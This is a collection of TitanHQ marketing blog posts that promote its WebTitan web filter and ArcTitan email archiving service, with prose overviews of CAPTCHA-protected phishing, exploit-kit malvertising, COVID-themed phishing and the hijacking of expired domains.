Google uses CAPTCHA and requires users to pass a pictorial challenge where it is necessary to select all the images in a group that featuring a car, bicycle, bus, or traffic lights. If you pass the challenge you will be allowed to proceed, if you fail you will not. Other versions involve entering in a number or code word that has been heavily disguised in an image.
While these CAPTCHA challenges can be annoying, they are associated with security so if a website has one of these challenges, subconsciously people tend to feel more secure. However, as with a website starting with HTTPS, it does not mean the website is genuine.
In this new phishing campaign, users are likely to feel more secure when credentials are requested since they had to pass a CAPTCHA test, especially considering the page on which the challenge was set up looks just like the genuine login prompt for Office 365. The background is the same, as is the login prompt. The only difference between the genuine login page and the fake version is the URL.
Security teams face a challenge detecting and blocking these phishing pages as email security solutions, despite having AI-based detection mechanisms, are essentially bots and, as such, cannot pass a CAPTCHA challenge.
A second tactic is also used to evade detection. The scammers have set up their campaign so that only a specific set of IP addresses will be presented with the CAPTCHA test on the fraudulent domain. If any IP address outside a specific range attempts to visit the link– the IP range used by the targeted company – a redirection will occur to the genuine Microsoft login page.
While these scams help to ensure that malicious emails are delivered to inboxes, organizations do not need to be totally reliant on their employees recognizing the scams and taking appropriate action (reporting the email to the IT security team).
With a web filtering solution in place, attempts to visit known malicious websites will be blocked. When malicious domains are detected they are automatically added to a web filter’s blacklist, and any attempts to visit malicious domains will be blocked.
WebTitan is a low maintenance security solution that can be set up in about 5 minutes and will protect against the web-based component of phishing attacks and will block malware downloads from malicious websites. WebTitan works in tandem email security solutions to provide greater protection against malware and phishing attacks. The solution can also be used to control the content that employees and guest network users can access over the internet, whether they are on the network or working remotely.
If you have not implemented a web filter or are unhappy with your current solution, give the WebTitan team a call to find out more. A product demonstration can be arranged, you can have a free trial of the solution, and assistance can be provided to help you get the most out of WebTitan during your trial.
The Internet opened up a world of new opportunities for businesses, allowing them to get in touch with customers around the world, explore new markets, find new suppliers, and access a wealth of knowledge. Web filtering solutions allow businesses to control internet access and monitor its use by employees and guest users, but why is web filtering in the workplace necessary, what are the benefits, and what are the risks of not filtering the internet? In this post we will explore the benefits of web filtering in the workplace.
What Exactly is a Web Filter?
You will no doubt be aware of spam filters, which are used to carefully control what emails are delivered to inboxes, blocking threats such as phishing emails and malware. Spam filters may also scan outbound email and apply controls to prevent data loss and malicious emails from being sent externally. A web filter performs a similar function for Internet access.
A web filter sits between your end users and the Internet and applies controls over the websites that can be accessed and the files that can be downloaded. The main function of a web filter is content control to restrict access to NSFW websites and block phishing websites and malware downloads.
Reasons for Web Filtering in the Workplace
There are many different reasons for web filtering in the workplace. These include:
Blocking access to inappropriate web content
Web filters are often used to prevent employees from accessing NSFW content such as pornography, images of violence, and hate speech, which can lead to the development of a hostile work environment. Businesses such as coffee shops, along with libraries and schools, use web filtering to create a family-friendly online environment and prevent minors from accessing age-inappropriate content.
Blocking online threats
Phishing attacks are now commonplace and there is a significant risk of malware being downloaded from the Internet. A web filter blocks these threats, by first preventing users from accessing known malicious websites and secondly by preventing downloads of malicious files.
Controlling bandwidth use
There will be a limited amount of bandwidth available and sometimes that bandwidth may be squeezed, resulting in considerable latency that affects all Internet users on the network. A web filter can be used to restrict bandwidth use by blocking certain online activities – video streaming for instance – ensuring sufficient bandwidth is available for all.
The Internet makes slacking off very easy for employees. Business can suffer major productivity losses from employees accessing certain types of websites which serve no purpose in the workplace. A web filter can be used to block access to social media networks, dating websites, gambling and gaming sites, and video streaming services such as YouTube.
Preventing legal issues
Legal issues can arise from uncontrolled Internet use. If an employee or user of a Wi-Fi network engages in illegal activity, the business owner may be liable for their actions. For instance, illegal software, music, and video downloads from P2P file sharing networks. Web filters can also prevent data theft by blocking access to file sharing sites.
Monitoring Internet use
You may want to adopt a permissive approach and only restrict access to illegal content and malicious websites, but a web filter gives you insights into what users are doing online. This can help you to prevent and resolve HR issues and identify insider threats.
How Web Filtering in the Workplace is Achieved?
There are several ways that web filtering in the workplace can be implemented. A physical appliance can be purchased through which all Internet traffic is routed, with controls applied by a system administrator. Cloud-based web filters are now much more popular. With filtering taking place in the cloud, no equipment purchases are required.
DNS-based web filtering sees filtering take place at the DNS lookup stage of a web request, with filtering occurring without content being downloaded. Cloud-based filters that operate at the DNS level also avoid any latency issues, which can be a problem with physical appliances.
Methods of Web Filtering
There are various methods of web filtering in the workplace, with most solutions using a combination of all.
Whitelists and Blacklists
Blacklists are used to block access to specific domains and URLs, either through third-party or user-generated blacklists. Whitelists are used to always allow access to a specific URL or domain, regardless of the content filtering controls put in place.
Category filtering is the easiest way of exercising content control. A web filtering solution will assign websites into categories based on the content of the website. Using a checkbox in the UI, the system administrator can select which categories of content should be blocked. Commonly blocked categories include pornography, gambling, gaming, dating, social media, news, and webmail.
Web filters can perform analyses of web content to detect certain keywords and can assign a score to each URL. Thresholds can be set for individual users, departments, or the entire organization and if that threshold is exceeded, the content will not be displayed.
WebTitan Cloud: Workplace Web Filtering Made Simple
WebTitan cloud is a powerful web filtering solution that provides visibility into the online activities of users and allows controls to easily be set to control Internet access and block online threats that could threaten your business. WebTitan Cloud has been developed to be easy to set up and use, with no technical prowess required to use the solution.
Highly granular filtering controls allow precision control over the content that can be accessed, without overblocking and preventing important web content from being accessed. The solution is DNS-based, so no equipment purchases or software downloads are necessary, and there is zero latency.
WebTitan Cloud protects on-site workers on the network, Wi-Fi users, and remote workers no matter where they access the Internet.
There is a transparent pricing policy, no optional extras, the product is extremely competitively priced, and customers benefit from industry-leading customer support.
Managed Service Providers (MSPs) that want to add web filtering to their service stacks benefit from many MSP-friendly features such as multiple hosting options, a brandable white-label version of the product, monthly billing, and pricing that accommodates rapidly changing numbers of seats.
To find out more about the full benefits of WebTitan Cloud, to arrange a product demonstration, give the WebTitan team a call today.
Many companies have adopted a hybrid workforce model, where employees spend some time in the office and some time working from home. This working model works well for the business and gives employees the flexibility they want.
Some businesses have transitioned to a fully remote workforce, but then 2020 arrived and virtually everyone had to do the same. Research from Gartner suggests that during the coronavirus pandemic, 88% of companies made remote working mandatory.
The rapid change to an office-based to remote workforce caused major headaches for IT teams, but it has allowed business to continue to function during incredibly challenging times. There have been productivity issues and technical problems, but business have weathered the storm and have continued to operate. Employees can still stay in touch and collaborate using online using chat platforms, videoconferencing, and the telephone and some businesses have reported an increase in productivity since switching to remote working.
While there are now many different methods of collaborating and maintaining contact, remote working has meant businesses and their employees have been forced to rely on email to a much greater extent. The increased reliance on email means it is now more important than ever to ensure emails can be accessed come what may, even if email servers are down. Should anything happen to the email system, work can grind to a halt.
Many businesses use emails as a store of essential information and much of the data in emails is not stored elsewhere. Figures from IDC indicate around 60% of business-critical data resides in emails and email attachments and that was before the pandemic.
There are many regulations covering business data, including at the federal, state, and industry level. There are set retention times for certain types of data, regardless of where the information is stored. If the information is stored in emails, then that information must be protected and secured against accidental or deliberate deletion until the retention period is over.
Backups of emails can be performed to meet certain regulations, but problems exist when it comes to recovering emails. Finding emails in backups can be an incredibly time-consuming process that can take days or weeks. Even finding the correct backup media can be a major challenge in itself, and then finding emails in a backup – which is not easily searchable – can seem a near impossible task.
The way to ensure privacy, security, and meet compliance requirements and ensure that emails and attachments are never lost is to use an email archiving service. Email archives are created for long term data storage. Email archives can be easily searched, so when emails need to be found and recovered, the process takes seconds or minutes. A tamper-proof record of all emails is retained for compliance purposes and to protect against data loss and ensure business continuity in the event of disaster.
Many businesses have implemented an on-premises email archive, but this is far from ideal in a world where virtually everyone is working remotely. After the pandemic is over, many employees will return to the office, but remote working looks set to stay. The best option is therefore to use an email archiving solution that perfectly suits the remote working or hybrid working model.
Cloud-based email archives centralize disparate email servers and store all emails securely in the cloud where they can be quickly and easily accessed by any authorized individual, from any location. Since many businesses now use cloud-based email, sending emails to a cloud-based archive makes more sense than using on-premises archives. Sending emails to the archive and recovering emails will be far quicker from a cloud service to a cloud service.
If you have an on-premises email archive, transitioning to a cloud-based service can save time and money. There is no need to maintain hardware, perform software updates, and the archive is automatically backed up to guarantee emails can always be recovered and storage space will never be an issue due to the scalability of the cloud.
TitanHQ’s Cloud-Based Email Archiving Solution
TitanHQ offers a cloud-based email archiving solution – ArcTitan Cloud – that is scalable to more than 60,000 users that delivers high performance and reliability. Every email sent and received by a company is automatically sent to the archive. Messages are deduplicated to save on storage space and are compressed in the archive. All emails are indexed and tagged to make searching a quick and easy process. Whenever an email needs to be recovered, a search of 30 million emails takes less than a second.
All emails are encrypted in transit to the archive and at rest and the email archive is automatically backed up. If emails need to be accessed during a mail server outage, they can easily be found in the archive. ArcTitan really is a set and forget solution.
ArcTitan Cloud supports point and click easy search or expert search with sophisticated query language. Searches can be saved, multiple searches can be performed at the same time, and you can search the entire archive, departments, user groups, or individual mailboxes. Permissions can be granted to employees to allow them to access their own archives to ensure they never lose and email and do not need to trouble the IT department when they misplace an email. You can search emails, but also inside all common file formats including Microsoft Word, Excel and PowerPoint, PDF, RTF, ZIP, tar, gz and Open Office documents.
Migrating from an existing cloud archiving service or an on-premises archive to ArcTitan Cloud is a quick and easy process and support will be provided if required. There are no proprietary data formats used, so if you ever want to export your data, that is a quick and easy process too.
Many email archiving services require you to pay for all mailboxes, even when employees leave the company. With ArcTitan, you only pay for the number of active mailboxes and there are no limits on storage space. The solution is easy to implement, use, and maintain, all of which have made the solution incredibly popular with SMBs and MSPs serving the SMB market. On top of that, ArcTitan is one of the most cost-effective arching solutions for businesses.
Figures correct as of July 2020.
For more information on cloud-based email archiving and the ArcTitan solution, give the TitanHQ team a call today.
While the telephone remains a vital tool for business, a great deal of transactions and conversations now take place over email. More than 306 billion emails are now being sent every day and a business with 100 employees will typically send or receive around 4,000 emails a day, many of which will contain important information that is critical to the successful operation of the business.
The loss of emails could prove very costly for businesses, as much of the information stored in emails and email attachments is saved nowhere else. In the event of disaster, such as corrupted PST files, hardware failure, or a destructive cyberattack, email data could well be permanently lost.
Not only could the loss of email hamper the ability of a business to operate, it could potentially result in a significant financial penalty. 24% of organizations have reported receiving a request from a court or regulatory body to produce emails. If emails can’t be produced, the cost of the financial penalties do not even bear thinking about. They could prove catastrophic to a business.
Most businesses backup their emails as part of their disaster recovery plans, but there are problems with backups. Backups cannot be searched, so finding emails can take an extraordinary amount of time. To ensure that emails are never lost and can be found and recovered in a matter of seconds or minutes, most businesses choose to use an email archiving solution.
Here we list 10 of the most important reasons for using an email archiving solution.
10 Reasons Why Businesses Should Archive Emails
Data Loss Prevention
One the most important reasons for using an email archive is for data loss prevention. Emails are sent to the archive for long term, secure storage. If an employee accidentally deletes an important email from their inbox, the message will not be lost as it can easily be recovered from the archive.
Mail Server Performance
The amount of emails now being sent places a strain on email servers and having large volumes of emails stored on the server negatively affects server performance. Storage space can also become an issue. By sending emails to an archive, they can be removed for the mail server which will greatly improve performance.
Litigation and eDiscovery
In the event of a lawsuit, you are likely to be required to produce emails related to the case and you will only have a short period of time in which to respond. Finding emails in PST files and backups can be an extraordinarily time-consuming process, and you may have to search through several years of email data to find all the emails you need. You must also ensure that the messages are original and have not been altered in any way. An email archive makes responding to eDiscovery requests and finding and producing emails a quick and simple process.
IT Department Productivity
The IT department has to spend a considerable amount of time on managing the email system and resolving email storage issues. When employees delete or lose important emails, the IT support desk is expected to respond. Sending emails to an archive eliminates email storage issues and simplifies maintenance. Employees can be allowed to access their own archives and can easily search for emails, saving the IT department a lot of time that can be put to much better use.
In the event of hardware failure, email data can easily be lost. Laptop computers may be lost or stolen, again resulting in the loss of email data. Ransomware and wiper malware attacks could easily wipe out the email system and could potentially result in critical data loss. By sending emails to the archive, in the event of disaster, emails can quickly and easily be recovered.
If you operate in a highly regulated industry you will need to retain email data for a set period of time, but all businesses must retain certain types of data, much of which is stored in email. An email archive helps with regulatory compliance. Data can be tagged and retention periods can be set, with emails automatically deleted when the legal retention period is over.
Data Access and Right to be Forgotten Requests
The General Data Protection Regulation (GDPR) and other laws give individuals the right to request a copy of the information that a company holds on them. If a request for access to personal data is received, the data must be produced quickly. An email archive allows you to instantly search for email data and quickly respond to right-of-access and right-to-be-forgotten requests.
There will likely be many occasions when you need to conduct internal audits of email data to find out what employees have been communicating via email. In the event of a customer dispute or an HR issue, you will need to search email data. An email archive makes this quick and easy, and allows you to resolve issues promptly without having to involve the IT department.
In the event of disaster, you will need to have quick access to email. If an employee suddenly leaves the company, you will need to find all emails related to specific clients. With easy access to email and with the advanced search capability of an email archiving solution, you will be able to ensure business can continue as normal.
Searching for lost emails, managing email servers, responding to eDiscovery requests, and producing email data for audits can take an extraordinary amount of time. An email archive will slash the amount of time that needs to be devoted these issues and helps you avoid unnecessary costs. An email archiving solution will more than pay for itself in terms of the costs saved.
ArcTitan – Cloud-Based Email Archiving from TitanHQ
ArcTitan is a powerful, secure, cloud-based email archiving solution from TitanHQ that ensures you will never lose an email. ArcTitan acts as a black box flight recorder for email and gives you total protection against email data loss.
The solution is fully compliant with all industry regulations, email data is protected with end-to-end encryption and is encrypted in the archive, the solution is quick to set up, easy to use, and effortless to manage.
Lightning fast searches can be performed when you need to find emails, with emails sent to the archive automatically at a rate of 200 emails a second with searches of 30 million emails taking less than a second.
There are no limits on storage space, no onsite hardware requirements, and you only pay for the number of active mailboxes. Businesses that use ArcTitan typically save up to 80% of email storage space.
For more information on ArcTitan, details of pricing, or to book a free demo, call the ArcTitan team today!
Exploit kits used to be one of the most common methods of distributing malware, although their use has dwindled to a fraction of the level seen in 2016. That said, there has recently been an uptick in the use of exploit kits and multiple threat actors are conducting campaigns to deliver malware payloads.
An exploit kit is malicious code that incorporates exploits for one or more vulnerabilities. When a visitor arrives on a website hosting an exploit kit, their computer is scanned for vulnerabilities and if one that is being targeted, the exploit is executed and a malicious payload such as a banking Trojan, keylogger, or ransomware is silently downloaded.
Exploit kits are loaded onto websites under the control of the attackers, which can be their own domains or a legitimate site that has been compromised. Traffic is usually sent to the exploit kit through malicious adverts on third-party ad networks (malvertising). These ad networks are used by many websites for adding revenue-generating third party adverts.
According to research conducted by Malwarebytes, a campaign is being conducted using the Fallout exploit kit to deliver the Racoon Stealer, with the EK loaded onto popular adult websites. The campaign was reported to the ad network and the malicious advert was removed, only to be replaced with an advert directing visitors to a site hosting the Rig exploit kit.
Another campaign was identified involving a different threat actor who is known to have targeted various adult ad networks. The malicious adverts were displayed on a wide range of different adult websites, including one of the most popular adult websites that generates more than 1 billion page views a month.
The threat actor had submitted bids for users of Internet Explorer only, as the exploit kit contained an exploit for an unpatched IE vulnerability. The vulnerabilities exploited were CVE-2019-0752 and CVE-2018-15982, the former is an IE vulnerability and the latter is a vulnerability in Adobe Flash Player. In this campaign, Smoke Loader malware was delivered, along with Racoon Stealer and ZLoader.
For an exploit kit to work, a computer must have an unpatched vulnerability, an exploit for which must be included in the EK. Prompt patching is therefore one of the best ways of ensuring that these attacks are not successful. It is also strongly advisable to stop using Internet Explorer and Flash Player. Vulnerabilities in each are frequently targeted.
These campaigns can also easily be blocked by using a web filter. Unless your business operates in the adult entertainment sector, access to adult content on work devices should be blocked. A web filter allows your business to block access to all adult websites, and other categories of web content that employees should not be accessing in the workplace.
A cloud-based web filter such as WebTitan is a low cost solution that can protect against a web-based attacks such as exploit kits and drive-by malware downloads, while also helping businesses to improve productivity by preventing employees from visiting websites that have no work purpose. Web filters can also reduce legal liability by preventing employees from engaging in illegal online activities, such as copyright infringing file downloads.
Once implemented – a process that takes a few minutes – access to certain categories of website can be blocked with the click of a mouse and employees will be prevented from accessing websites known to harbor malware, phishing kits, and other potentially malicious websites.
For further information on WebTitan and protecting your business from web-based threats, give the TitanHQ team a call today.
COVID-19 has created a great many challenges for businesses and has forced them to adapt to a new way of working very quickly. Businesses that had mostly office-based workers have had to change to having virtually everyone working remotely.
Employees working from home are maintaining contact via IM solutions, email, and videoconferencing platforms such as Zoom and Microsoft Teams, but in contrast to office-based work, businesses are now relying on their employees to stay connected and remain productive.
While most businesses have adapted to the new way of working, many business leaders are concerned about how to protect their data and maintain compliance with most of their employees working from home. Employers have had to accept that remote working, to some degree, is now the new normal, so steps must be taken to ensure business and email continuity.
On Tuesday, September 22, 2020, TitanHQ is hosting a webinar to discuss these and other concerns and offer a solution that can help to keep businesses moving forward when employees are working remotely.
During the webinar TitanHQ experts will discuss the following topics:
The Current 2020 Technology Landscape
Security & Compliance in a time of Global Remote Working
Increase in Companies Relying Solely on Office 365
Protecting Business Critical Data
The Importance of Continuity in the Era of Remote Working
Attendees will also be given a live demo of TitanHQ’s cloud email archiving solution, ArcTitan.
Title: How to Ensure Business Continuity with Email Archiving for your Remote Workforce
Many businesses have created an email archive for compliance purposes and to ensure emails, documents, calendars, and other data in the email system is preserved to meet regulatory obligations and for disaster recovery.
Many businesses only discover after they have been using an email archive that it does not quite live up to expectations, is proving to be expensive, or the archive is no longer performing as well as it should.
Once you have set up an email archive, it does not mean that you are tied to any provider. Migrating your email archive to another provider that offers a service that is more suited to your organization requires a little planning, but it can be a pain free process.
Is it Time to Upgrade your Email Archive?
One of the main reasons for changing an email archive is because legacy archives have become sluggish due to the volume of backed up data. Over time, these legacy archives can become unreliable, searches do not always provide all the results, and in some cases the archiving solution reaches end of life and patches are no longer issued so security becomes an issue.
Storage space can become a problem if you are using aging email archiving appliances or physical servers, and latency can increase, especially if you have transitioned to cloud-based applications such as Office 365. If an email archive is failing to perform, it is time to upgrade to a new archiving solution; one that is more modern, can be searched much more rapidly, and does not pose a security risk to your organization.
Cloud Email Archives Can Solve Your Archiving Problems
With an increasing number of organizations having migrated to Office 365, using a cloud-based email archiving service makes a great deal of sense. Your email data is already in the cloud, so switching to a cloud-based email archive is a logical step. Moving data from the cloud to on-premises infrastructure is likely to involve some degree of latency, whereas archiving from a cloud service to another will avoid these latency problems and see improvements in performance.
You will not need maintain on-premises hardware with a cloud-based archive. The email archiving service provider is responsible for maintaining the hardware, patching, and performing updates. Cloud-based email archives also have scalability. As your email volume grows, your archive automatically scales, and more storage space is made available. You will never run out of storage space with a cloud email archiving service. Your cloud email service provider will just arrange for more servers to be made available.
Cloud email archives can also be accessed from any location, on any device, through either an email client or web browser – something that has become much more important during the COVID-19 pandemic, with many employees now working from home.
Making the change to a new email archiving service provider will likely greatly improve performance and allow faster archiving and searching. That means considerable productivity gains and less headaches for your IT department as the maintenance burden will be eased.
Companies that switch from legacy email archives to cloud archiving services can greatly reduce the cost of email archiving, allowing them to put their resources to much better use. Even switching from one cloud email archiving solution to another can see considerable costs saved.
ArcTitan: Save Costs and Improve the Performance of Your Archive
Regardless of the current email archiving solution you are using, migrating your email archive to ArcTitan is a straightforward and quick process. TitanHQ will guide you through the migration process, providing detailed steps to take to get your archive migrated quickly. Alternatively, we can talk you through the process and even work with your current provider directly to transfer your archive.
If you are upgrading from a legacy email solution to Office 365, you can simply transfer your archived data to ArcTitan, rather than send it to Office 365. Again, full assistance will be provided by our knowledgeable engineers.
Many ArcTitan customers have managed to reduce the load on their mail servers by 80%, significantly improving performance. Maintenance time can be slashed by around 50%, and the cost savings are considerable.
Then there is the speed of the solution. ArcTitan conducts searches at a rate of 30 million emails a second, searches can be combined, multiple searches run at once, and emails and attachments searched in the same search. Searches can also be saved if you conduct them frequently.
Security is assured with email data protected by end-to-end encryption, with passwords hashed and encrypted. Your archive is encrypted and stored securely on Replicated Persistent Storage on AWS S3 and will be automatically backed up. Updates are managed for you and there will never be any patches to apply.
On top of all the features of ArcTitan, many of which are lacking in other email archiving solutions, you are also likely to be pleasantly surprised at the price of the solution (and the margin if you are an MSP looking to add email archiving to your service stack.)
For more information about ArcTitan and migrating your archive, give the TitanHQ team a call today and take the first step toward eliminating your email archiving headaches.
What our Customers Say…
“Fast, scalable, very easy to operate and has all the email archiving features a company needs to have. Safe and the cost was fantastic. A truly superb email archiving tool,” Jesse Gusmao, IT Manager.
Sociedade Hospital Samaritano. Brazil.
“I can tell you our experience has been outstanding. ArcTitan email archive has been the most effective solution we’ve found. Initially, we tested it for ourselves, but given the success we’ve had, we’re now signed up as a reseller and are confidently introducing the product to our small and medium clients.” Lou Liberio, IT Director. Clarion Data Systems, USA
“Exceptionally easy to install and insert into our email infrastructure. The effect and affect of ArcTitan Email Archiving was dramatic. The load on our Exchange server was reduced by 80% immediately.” Mike Pluta, IT Director. NRC Broadcasting, USA
Several thousand email messages can be received by a business every day, and many of those messages contain important documents and sensitive information, which in some cases is saved nowhere else other than the email system or on a user’s local device.
Several regulations require email data to be backed up and stored for a certain time period, with many businesses choosing to store copies of business emails using backups. While backups will allow a business to comply with regulations and ensure messages can be recovered in the event of disaster, backups are not searchable which makes recovery of emails a time-consuming process.
An email archive is a much better solution. Email archives store emails in a tamper-proof repository and, in contrast to backups, prior to being sent for long term storage, emails and attachments are indexed to allow them to be searched on demand. When an email needs to be found, a search can be performed and individual emails can be found and recovered in seconds or minutes, whereas the process of finding and recovering emails from a backup could take days.
In the event of a legal investigation, it is essential for emails to be produced. Businesses must be able to prove the integrity of email data and show an original copy of the messages is provided that has not been altered since being sent or received. If you cannot prove the integrity of email messages, you could get in serious legal trouble. In the event of a cyber-incident, email messages are checked in the investigation process, so it is also essential to maintain message integrity and ensure all emails can quickly be recovered.
Given the number of emails received by businesses every day, the amount of storage space that must be devoted to emails and attachments grows quickly. Businesses are likely to require terabytes of storage space, which can prove costly. A cloud-based archive ensures that there is always sufficient storage space available and rules can be sent to delete emails and attachments securely when they are no longer required to be retained by law. A cloud-based archive can reduce storage use by up to 75% compared to on premise storage and reduce maintenance time by up to 50%, resulting in significant cost savings.
Many businesses use Outlook for email, which stores emails in Personal Storage (PST) files. These files are stored locally on each user’s device and are not tamper-proof. They can also become corrupted, can be targeted in cyberattacks, and are at risk of being accidentally deleted. If these files are not backed up, in the event of data corruption or accidental deletion, they cannot be recovered. Using an email archive ensures that all users’ email data can be recovered, and users’ PST files can be quickly and easily restored. Without an email archive, critical business emails could easily be lost.
If you are required to comply with the E.U. General Data Protection Regulation, you must be able to search for data in email if a request is made by an E.U. citizen to access their data or if they exercise their ‘right to be forgotten.’ If you have an email archive, searches can be performed quickly, and it is easy to satisfy these GDPR requests. The failure to respond to these requests quickly, could easily result in a substantial fine for noncompliance.
Should you ever need to change email systems and migrate to new email servers, all inboxes, messages, and attachments will need to be migrated to the new server. If you do not have the right systems in place, that process can be difficult and time-consuming. Using an email archive makes the process faster and simpler, ensuring seamless migrations with few errors, saving considerable time and effort.
In summary, and email archive will…
Ensure a tamper-proof copy of email data is retained and is always accessible
Allow you to search millions of emails in seconds
Reduce server management costs
eDiscovery requests can be processed quickly
Email data is protected against cyberattacks and can always be recovered in the event of a data destruction event
Email migrations can be performed quickly and easily without data corruption
Reduce storage space by 50% or more and greatly reduce costs
Maintain an audit trail to ensure compliance with regulations such as Sarbanes-Oxley (SOX), PCI-DSS, SEC, DPA, HIPAA, and GDPR
Free up IT support time by allowing employees to access their own email archives
Help with compliance and ensures data can be quickly found and produced in the event of an investigation
ArcTitan: Email Archiving Made Simple
ArcTitan is a powerful email archiving solution from TitanHQ that makes archiving email, performing searches, and recovering email data a quick and simple process.
Key Features of ArcTitan
Scalable, email archiving that grows with your business
Email data stored securely in the cloud on Replicated Persistent Storage on AWS S3
Lightning fast searches – Search 30 million emails a second
Rapid archiving at up to 200 emails a second
Automatic backups of the archive
Email archiving with no impact on network performance
Ensure an exact, tamper-proof copy of all emails is retained
Easy data retrieval for eDiscovery
Protection for email from cyberattacks
Eliminate PSTs and other security risks
Facilitates policy-based access rights and role-based access
Only pay for active users
Slashes the time and cost of eDiscovery other formal searches
Migration tools to ensure the integrity of data during transfer
Seamless integration with Outlook
Supports single sign-on
Save and combine searches
Perform multiple searches simultaneously
Limits IT department involvement in finding lost email – users can access their own archived email
Compliant with regulations such as HIPAA, SOX, GDPR, Federal Rules of Civil Procedure, etc.
If you are not yet archiving your email, are unhappy with your current provider, or are an MSP that is not yet offering email archiving to your clients or is unhappy with the service or margins with your current provider, give the TitanHQ team a call to find out more about ArcTitan.
The COVID-19 pandemic created a massive opportunity for cybercriminals, and they have been exploiting it with vigor, especially in phishing campaigns. Phishing is the use of deception to trick someone into performing an action. Social engineering techniques are used to get people to open malicious email attachments, visit hyperlinks to websites where sensitive information is harvested, or to take other actions such as make donations to fake charities.
In the early stages of the pandemic when little was known about the virus, how it was spread, the risk of infection, and the disease it caused, the public was very much in the dark and craved information. This created the perfect opportunity for cybercriminals for use in phishing and other cyberattacks.
Recently, the United Nations released data collected about phishing attacks involving COVID-19 related themes showing there had been a 350% increase in new phishing websites in the first quarter of the year, many of which were health-related and targeted health systems and hospitals.
Research conducted by Check Point also found a major rise in domain registrations linked to COVID-19. Research showed that phishing attacks increased from around 5,000 a week in February to more than 200,000 per week by late April, many of which were linked to COVID-19.
Early in the year the lack of knowledge about COVID-19 and the SARS-CoV-2 virus suited large-scale phishing campaigns involving millions of messages, with cybercriminals re-purposing their normal campaigns and started using COVID-19 themed websites and lures. Phishing emails offered information about the virus, possible cures, and advice to avoid being infected. When there was a shortage of personal protective equipment, phishing lures were used offering low cost supplies and testing kits.
Now that there is more information about the virus and cases and PPE shortages have largely been addressed, phishing scams related to COVID-19 have evolved. A study conducted by ProPrivacy showed that far from the COVID-19 related phishing attacks disappearing and cybercriminals returning to their old campaigns using fake invoices and alike, these campaigns are still running, but they have become more targeted and sophisticated.
These targeted campaigns offer answers to new questions being raised by the public, such as whether it is safe for children to return to schools. The study, conducted in partnership with VirusTotal and WHOIS XML, identified 1,200 COVID-related domains were still being registered each day and a sample of 600,000 of those domains revealed around 125,000 of them were malicious and were mostly being used for phishing.
We can expect to see another wave of phishing emails and websites set up related to COVID-19 vaccines when they start to come to market. Since the threat has not gone away and is likely to remain for some time to come, it is important to remain on your guard and to be cautious with any emails received, especially those related to COVIID-19.
Businesses also need to take extra care to ensure that their employees and devices are protected. Most businesses will already have a spam filtering solution in place to block phishing emails, but now is a good time to review those controls. If spam and phishing emails are still reaching inboxes, consider an alternative solution or a third-party spam filter if you are using Office 365 and are relying on Exchange Online Protection for spam and phishing protection.
One anti-phishing measure that is less commonly used by businesses is a web filter. A web filter allows businesses to control the websites and webpages that their employees can visit. Web filters, such as WebTitan, block access to websites known to be malicious, such as those known to be used for phishing. Web filters also categorize websites and allow certain categories to be blocked. By carefully controlling the web content that can be accessed by employees, businesses will be much better protected against phishing attacks and other cyber attacks with a web-based component.
It is also strongly recommended to implement 2-factor authentication, which will provide protection in the event of credentials being compromised in a phishing attack.
If you would like more information about web filtering, WebTitan, or improving your spam filter, give the TitanHQ team a call.
Cybercriminals have adopted a new tactic to deliver malware and conduct phishing attacks on unsuspecting internet users. They are hijacking inactive domains and using them to direct visitors to malicious websites in a form of malvertising.
Malvertising is the term given to the use of malicious code in seemingly legitimate adverts, which are often displayed on high-traffic websites. Website owners use third-party ad networks as a way to increase revenue from their websites. Most of these adverts are genuine and will direct users to a legitimate website, but cybercriminals often sneak malicious code into these adverts. Clicking the link will direct the user to a website hosting an exploit kit or phishing form. In some cases, ‘drive-by’ malware downloads occur without any user interaction, simply if the web content loads and the user has a vulnerable device.
The new tactic uses domains that have expired and are no longer active. These websites may still be listed in the search engine results for key search terms. When user conducts a search and clicks the link or uses a link in their bookmarks to a previously visited website, they will arrive at a landing page that explains that the website is no longer active. Oftentimes, that page will include a series of links that will direct the visitor to related websites.
What often happens is these expired domains are put up for sale. They can be attractive for purchasers as there may already be many links to the website, which is preferable to starting a brand-new website from scratch. These expired domains are then auctioned. Researchers at Kaspersky found that cybercriminals have taken advantage of these auction-listed websites and have added links that direct visitors to malicious websites.
When a visitor arrives on the site, instead of being directed to the auction stub, the stub is replaced with a link to a malicious website. The study uncovered around 1,000 domains that had been listed for sale on a popular auction site, which redirected visitors to more than 2,500 unwanted URLs. In the majority of those cases, the URLs were ad-related pages, but 11% of the URLs were malicious and were mostly being used to distribute the Shlayer Trojan via infected documents that the user is prompted to download. The Shlayer Trojan installs adware on the user’s device. Several of the sites hosted malicious code on the site rather than redirecting the visitor to a different website.
These domains were once legitimate websites, but are now being used for malicious purposes, which makes the threat hard to block. In some cases, the sites will display different content based on where the user is located and if they are using a VPN to access the internet. These websites change content frequently, but they are indexed and categorized and if determined to be malicious they are added to real time block lists (RBLs).
A web filtering solution such as WebTitan can provide protection against malvertising and redirects to malicious sites. If an attempt is made to send a user to a known malicious website, rather than being connected the user will be directed to a local block page, negating the threat. WebTitan can also be configured to block downloads of risky file types from these websites.
Many organizations have implemented firewalls to prevent direct attacks by hackers, use antivirus software to block malware, and use an anti-spam solution to block attacks via email, but there is a gap in their security protections and web-based threats are not effectively blocked. WebTitan allows organizations to plug that gap and control the websites that can be accessed by employees.
For further information on WebTitan and filtering the internet, give the TitanHQ team a call. WebTitan is available on a free trial to allow you to evaluate the solution and see for yourself how you can block attempts to visit malicious web content and NSFW sites.
TitanHQ customers that are currently using the ArcTitan email archiving solution for long term email storage will soon benefit from a vastly improved email archiving service. TitanHQ is in the process of migrating customers to new email archiving systems that have been developed to improve performance, reliability, and scalability.
The new ArcTitan email archiving service is being delivered on new infrastructure – A highly available, horizontally scaling Kubernetes cluster that is self-maintaining and self-healing. Within the cluster are multiple components that work in harmony, but independently. This has the advantage of ensuring that in the event of a server outage or if a component goes down, there will be minimal or no downtime. Any time a component goes down, all others will remain available and the component that has gone down will be taken offline and automatically repaired. Other components will not be affected.
The new email archiving systems offer replicated persistent storage through Ceph storage clusters. This provides high performance storage and file systems, with automated data replication and fail over. Amazon S3 is used for long term storage of archived email data, providing reliability, redundancy, and scalability. A Percona XtraDB MySQL cluster is deployed within Kubernetes for handling all database operations. The cluster is self-maintaining, self-healing, and can be scaled with minimal effort and zero downtime. Customers are also provided with a new and improved ArcTitan GUI.
Managing the Migration
